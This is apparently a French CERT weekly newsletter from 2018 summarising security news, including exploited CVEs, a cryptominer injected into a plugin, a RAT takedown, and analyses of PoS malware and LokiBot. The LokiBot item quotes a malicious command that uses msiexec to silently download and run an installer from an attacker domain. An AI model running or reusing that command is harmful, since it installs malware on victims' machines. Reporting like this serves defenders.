| Newsletter CERT-OPMD

L’équipe CERT-OPMD vous propose de réagir sur l’actualité à travers sa newsletter hebdomadaire.

Cisco ASA : la vulnérabilité CVE-2018-0101 exploitée dans la nature

La vulnérabilité CVE-2018-0101 impactant plusieurs versions du produit ASA de Cisco est activement exploitée dans la nature. Pour rappel cette vulnérabilité est due à une mauvaise gestion des messages au format XML. Une exploitation réussie permet à un attaquant d’exécuter du code sur la machine ou de provoquer un déni de service.
Cedric Halbronn le chercheur à l’origine de la découverte de cette vulnérabilité a présenté ses travaux de recherches lors de la conférence REcon à Bruxelles. On y apprend par ailleurs que la vulnérabilité est potentiellement présente sur les CISCO ASA depuis 2011, date depuis laquelle le AnyConnect Host Scan est disponible.
Une preuve de concept, construite en se basant sur la présentation de Halbronn à la REcon, a été publiée anonymement sur Pastebin.
En parallèle un honeypot permettant de surveiller les tentatives d’exploitation de cette vulnérabilité est disponible sur GitHub.

Minage de crypto monnaies : plusieurs sites infectés à cause du plugin Browsealoud

Browsealoud est un plugin d’assistance aux personnes en situation de handicap. Ce dernier permet par exemple la lecture des pages web pour les personnes aveugles. Le code de ce dernier a été modifié par des attaquants afin d’y injecter du code malveillant, encodé en hexadécimal, destiné au minage de monnaies électroniques.
4275 sites utilisant ce plugin ont été infectés. Au Royaume-Uni des sites institutionnels comme le Information Commissioner’s Office (ICO) (ico.org.uk) ou encore le Student Loans Company (slc.co.uk) ont été impactés.
Texthelp, l’entreprise qui développe le plugin Browsealoud a rapidement bloqué l’attaque en mettant hors ligne le plugin. Cette dernière a aussi annoncé qu’aucune donnée de clients n’a été volée par les attaquants.

https://www.theregister.co.uk/2018/02/11/browsealoud_compromised_coinhive/ [EN]

http://www.zdnet.fr/actualites/des-crypto-mineurs-ont-detourne-4275-sites-d-organisations-publiques-dont-des-francais-39863988.htm [FR]

Luminosity RAT : un groupe de cybercriminels arrêté

Europol, avec l’aide du NCA (National Crime Agency) au Royaume-Uni et d’une douzaine d’agences de renseignements Européen, Nord américain et Australien, a réussi à démanteler un groupe de cybercriminels liés à l’écosystème du malware Luminosity RAT (aka LuminosityLink). Ce démantèlement a eu lieu en Septembre 2017.
Luminosity RAT un malware apparu en 2015 est devenu très populaire en 2016. Ce malware de type RAT (Remote Administration Tool), permettant une prise de contrôle totale à distance par l’attaquant, a été vendu sur le darkweb aux alentours de $40.
Tout commence en Septembre 2016, lorsque les forces de l’ordres du Royaume-Uni ont arrêté un cybercriminel lié au RAT. Cette arrestation a déclenché de nouvelles investigations qui ont permis d’arrêter plusieurs autres personnes et saisir d’importants lots de matériels. Un petit réseau de vendeurs et acheteurs (8600) réparti dans 78 pays a ainsi pu être démantelé.
L’investigation forensique sur le matériel saisi est toujours en cours.

https://www.europol.europa.eu/newsroom/news/international-crackdown-anti-spyware-malware [EN]

http://www.nationalcrimeagency.gov.uk/news/1283-data-stealing-hacking-tool-taken-out-of-use [EN]

PinME : comment traquer un smartphone sans GPS

Des chercheurs de l’université de Princeton ont mis au point une application appelée PinMe capable de tracer l’itinéraire d’un smartphone sans utiliser le GPS. L’application utilise des algorithmes qui se basent sur un point de départ pouvant être une adresse IP publique, une heure locale (time zone), combiné avec des données envoyées par les capteurs ainsi que des données publiques telles que les cartes (maps) et la météo afin de déterminer l’itinéraire.
Le gyroscope fait office de boussole et la pression de l’air est mesurée via l’accéléromètre. Toutes ces informations vont servir à comprendre et mémoriser les habitudes de l’utilisateur.
Une fois les patterns de l’activité de l’utilisateur déterminés, des algorithmes de machine learning, embarqués dans l’application, permettent de détecter si ce dernier est dans un avion, une voiture, un train ou marche à pied.
Cette application pourrait permettre aux forces de l’ordres de résoudre des crimes ou des cas de kidnapping, même si une utilisation abusive de cette dernière est toujours possible.

Malware UDPoS : exfiltration de données via UDP depuis un PoS

Un nouveau type de malware ciblant les PoS (Point De Vente) a été découvert par les chercheurs de Forcepoint. Ce malware tient sa particularité via son utilisation du protocole DNS basé sur UDP afin de communiquer avec son serveur de commande (C&C).
Le malware se présente à la victime comme étant un pack du logiciel d’assistance à distance LogMeIn. En plus du nom trompeur, le malware communique avec un serveur C&C à l’adresse service-logmeln.network. On relève assez facilement le typosquatting qui utilise un “L” minuscule à la place du “I”.
L’investigation sur le serveur C&C a permis aux chercheurs de mettre la main sur un fichier 7-zip de type SFX permettant le lancement automatique du malware LogmeinServicePack_5.115.22.001.exe. Une fois la persistance mise en place grâce à un service système en lancement automatique, le malware démarre le composant logmeinumon.exe chargé de monitorer la bonne exécution du malware.
Il est capable de détecter certains antivirus et sandbox en se basant sur des noms de DLL ou de tubes nommés (pipe). Le malware exécute ensuite un script batch contenant une série de commandes de prise d’empreinte qu’il envoie par la suite au serveur C&C via DNS. Toutes les communications avec le C&C sont sous la forme {Machine ID}.{Message Type}.xxxx.xxxx.xxxx.xxxx. Le Message Type peut prendre les valeurs : bin, info, ping, trp, and note.
Ce type de communication via DNS, assez “discret” permet au malware de dérober les informations des cartes bancaires sans lever d’alertes.

LokiBot : le malware utilise l'installateur Windows msiexec.exe

Une nouvelle campagne d’infection du malware LokiBot a été detectée par les chercheurs de TrendMicro. Cette dernière utilise le service d’installation de Windows msiexec.exe afin de déposer le malware sur le système.
Le malware est distribué via des campagnes de malspam contenant des pièces jointes de type office word malveillantes qui exploitent la vulnérabilité CVE-2017-11882. L’exploitation de cette vulnérabilité permet le téléchargement d’un fichier nommé zus.msi qui sera lancé par msiexec.exe via la commande “cmd.exe /c msiexec /q /I “https://www\.uwaoma\.info/zus.msi”.
L’utilisation d’un package MSI étant quelque chose d’assez rare chez les malwares, cette campagne a donc de grande chance de passer inaperçue par les antivirus.

Apple : le code source d’iBoot publié sur GitHub

Le code source du composant coeur du système d’exploitation des iPhones a fuité sur GitHub. Le code de iBoot devrait permettre aux chercheurs malveillants comme bienveillants de trouver des vulnérabilités permettant de “jailbreak” ou d’installer un malware persistant sur les systèmes iOS.
iBoot est un bout de code d’iOS chargé d’assurer les vérifications de sécurité lors du démarrage du système.
La source de ce leak semble être un ancien employé d’Apple. Ce dernier ayant quitté la société en 2016 serait parti avec un bout de code d’iBoot qu’il aurait partagé avec un cercle restreint d’amis intéressés par les techniques de “jailbreak”.
Ce n’est pas la première fois que le code de iBoot fait l’objet d’une fuite. Il avait initialement été partagé sur Reddit quelques mois auparavant.

https://thehackernews.com/2018/02/iboot-ios-source-code.html [EN]

https://motherboard.vice.com/en_us/article/xw5yd7/how-iphone-iboot-source-code-leaked-on-github [EN]

http://www.zdnet.fr/actualites/iboot-fuite-chez-apple-et-very-bad-trip-chez-des-jailbreakers-39863990.htm [FR]

Malware : une attaque ciblée au Moyen-Orient découverte par Talos

Les chercheurs de Talos nous présente dans cet article l’analyse de l’infrastructure assez complexe d’un malware écrit principalement en langage de scripting (Powershell, VBScript et WSF Script). Ce dernier arrive via un fichier vbs nommé من داخل حرب ايران السرية في سوريا.vbs (« From inside Iran’s secret war in Syria.vbs »).
Le malware posséde 4 étapes d’installation : VBScript, Powershell, document office avec macros et ensuite WSF Script.
Les serveurs C&C en plus d’être protégés par Cloudflare, filtrent les requêtes en fonction des user-agent et ne sont accessibles qu’à un certain moment de la journée (matin en heure Central European Timezone). Les C&C sont aussi capables de détecter des tentatives d’analyse et ainsi effacer les traces de l’infection sur le système.
Ce malware présente des similitudes avec le malware Jenxcus ( a.k.a Houdini/H-Worm) qui laissent penser qu’il serait une évolution de ce dernier.

http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html [EN]